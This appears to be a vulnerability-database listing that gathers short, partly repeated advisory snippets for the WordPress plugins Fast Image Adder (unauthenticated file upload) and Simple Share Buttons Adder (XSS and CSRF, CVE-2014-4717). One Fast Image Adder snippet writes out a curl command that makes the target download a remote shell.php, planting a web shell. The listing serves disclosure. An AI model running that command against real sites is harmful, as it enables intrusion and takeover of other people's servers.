WordPress Fast Image Adder Plugin <= 1.1 - Remote File Upload

This plugin is prone to a remote file upload vulnerability, because the fast-image-adder-uploader.php file doesn't check if a user is authorized to upload files. It creates a random file name, but reports the name back to the user. Solution Update the plugin...

WordPress Fast Image Adder Plugin <= 1.1 - Remote File Upload

This plugin is prone to a remote file upload vulnerability, because the fast-image-adder-uploader.php file doesn't check if a user is authorized to upload files. It creates a random file name, but reports the name back to the user. Solution Update the plugin...

Fast Image Adder <= 1.1 - Unauthenticated Remote File Upload

The fast-image-adder WordPress plugin was affected by an Unauthenticated Remote File Upload security vulnerability. $ curl http://www.example.com/wp-content/plugins/fast-image-adder/fast-image-adder-uploader.php?confirm=url&url=http://sitewithshellstodl/shell.php Shell location is reported back t...

Simple Share Buttons Adder <= 6.0.0 - Reflected Cross-Site Scripting (XSS)

A reflected XSS in "Simple Share Buttons Adder" before version 6.0.1 lead to a reflected cross-site scripting vulnerability on all pages where the "Simple Share Buttons Adder" was added usually all blog posts. Exploitation required that the browser did not encode the parameters sent to the server...

Simple Share Buttons Adder <= 6.0.0 - Reflected Cross-Site Scripting (XSS)

A reflected XSS in "Simple Share Buttons Adder" before version 6.0.1 lead to a reflected cross-site scripting vulnerability on all pages where the "Simple Share Buttons Adder" was added usually all blog posts. Exploitation required that the browser did not encode the parameters sent to the server...

CVE-2014-4717

Multiple cross-site request forgery CSRF vulnerabilities in the Simple Share Buttons Adder plugin before 4.5 for WordPress allow remote attackers to hijack the authentication of administrators for requests that conduct cross-site scripting XSS attacks via the 1 ssbasharetext parameter in a save...

Cross site request forgery (csrf)

Multiple cross-site request forgery CSRF vulnerabilities in the Simple Share Buttons Adder plugin before 4.5 for WordPress allow remote attackers to hijack the authentication of administrators for requests that conduct cross-site scripting XSS attacks via the 1 ssbasharetext parameter in a save...

CVE-2014-4717

CVE-2014-4717 affects the WordPress plugin “Simple Share Buttons Adder” (versions prior to 4.5). The issue comprises multiple CSRF vulnerabilities that allow remote attackers to hijack administrator sessions and trigger stored XSS via the ssba_share_text parameter in a save action to wp-admin/opt...

CVE-2014-4717

Multiple cross-site request forgery CSRF vulnerabilities in the Simple Share Buttons Adder plugin before 4.5 for WordPress allow remote attackers to hijack the authentication of administrators for requests that conduct cross-site scripting XSS attacks via the 1 ssbasharetext parameter in a save...

Wordpress Simple Share Buttons Adder Plugin 4.4 - Multiple Vulnerabilities

No description provided by source. Details ================ Software: Simple Share Buttons Adder Version: 4.4 Homepage: https://wordpress.org/plugins/simple-share-buttons-adder/ Advisory report: https://security.dxw.com/advisories/csrf-and-stored-xss-in-simple-share-buttons-adder/ CVE: Awaiting...

WordPress Plugin Simple Share Buttons Adder 4.4 - Multiple Vulnerabilities

WordPress Plugin Simple Share Buttons Adder 4.4 - Multiple Vulnerabilities Details ================ Software: Simple Share Buttons Adder Version: 4.4 Homepage: https://wordpress.org/plugins/simple-share-buttons-adder/ Advisory report:...

WordPress Simple Share Buttons Adder Plugin 4.4 - Multiple Vulnerabilities

Simple Share Buttons Adder plugin is prone to multiple vulnerabilities CSRF and XSS that allow an attacker to convince an admin to visit a link of their choosing. Solution Update to version 4.5...